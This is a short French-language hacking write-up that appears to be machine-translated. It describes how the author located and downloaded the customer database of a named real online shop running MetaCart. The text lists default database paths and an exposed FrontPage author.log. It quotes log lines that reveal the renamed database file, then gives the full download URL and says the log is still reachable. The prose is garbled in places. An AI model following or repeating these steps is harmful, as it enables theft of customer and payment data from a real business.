vulnérabilité metacart

Voyager une fois sur un site Internet , je suis tombé sur cette petite boutique en ligne qui vend des valeurs simples de la démocratie américaine.
Et là , je pensais savoir à quelle fréquence ils montrent le patriotisme, que le magasin accepte non seulement les chèques , mais aussi ss encore plus.
Grimpez sur le site, je me suis aperçu que le magasin fonctionne sur le système de metacart, mais les demandes standards www.swimamerica.org/metacart/database/metacart.mdb~~number=plural www.swimamerica.org/metacart/metacart.mdb ou de type ne sont pas exploités.
On peut voir l'admin a changé le nom de la base de données. Je décidai alors de consulter le site de la présence de scripts qui fuient des bugs graves n'a pas été, mais rencontré un fichier author.log très intéressant (www.swimamerica.org/_vti_log/author.log - il est toujours là, où il y avait un grand nombre de type de déchets:
[18 juin 2002 12:54:47 -0600] 66.176.193.110 asca / KJSwimAmerica [ obtenir le document] kjsaabout.htm
[18 juin 2002 12:55:47 -0600] 66.176.193.110 asca / KJSwimAmerica [ obtenir le document] babieslearntofloat.htm
[18 juin 2002 12:56:06 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] babieslearntofloat.htm
[18 juin 2002 12:56:15 -0600] 66.176.193.110 asca / KJSwimAmerica [ obtenir le document] toddlerlessons.htm
[18 juin 2002 12:56:29 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] toddlerlessons.htm
[18 juin 2002 12:56:40 -0600] 66.176.193.110 asca / KJSwimAmerica [ obtenir le document] lessons.htm
[18 juin 2002 12:57:18 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] lessons.htm
[18 juin 2002 12:57:29 -0600] 66.176.193.110 asca / KJSwimAmerica [ obtenir le document] semiprivatelessons.htm
Mais il y avait des lignes très intéressantes:
[19 juin 2002 08:12:41 -0600] 66.176.193.110 asca / [get document] metacart / productsByCategory.asp
[19 juin 2002 08:16:05 -0600] 66.176.193.110 asca / [get document] metacart / product.asp
[19 juin 2002 08:32:29 -0600] 66.176.193.110 asca / [mettre le document] metacart / base de données / mcart2.mdb
Dans le dernier que vous avez déjà compris, le répertoire spécifié et mémoriser le nom de base de données: metacart / base de données / mcart2.mdb. Administrateur Aperçu pas particulièrement gimor appelé.
Vous êtes mis dans un navigateur URL complète www.swimamerica.org/metacart/database/mcart2.mdb et attendre jusqu'à ce que toute la base de fusion.
Voilà tout.

Votre bug Durito.
_________________
MANGER LES RICHES!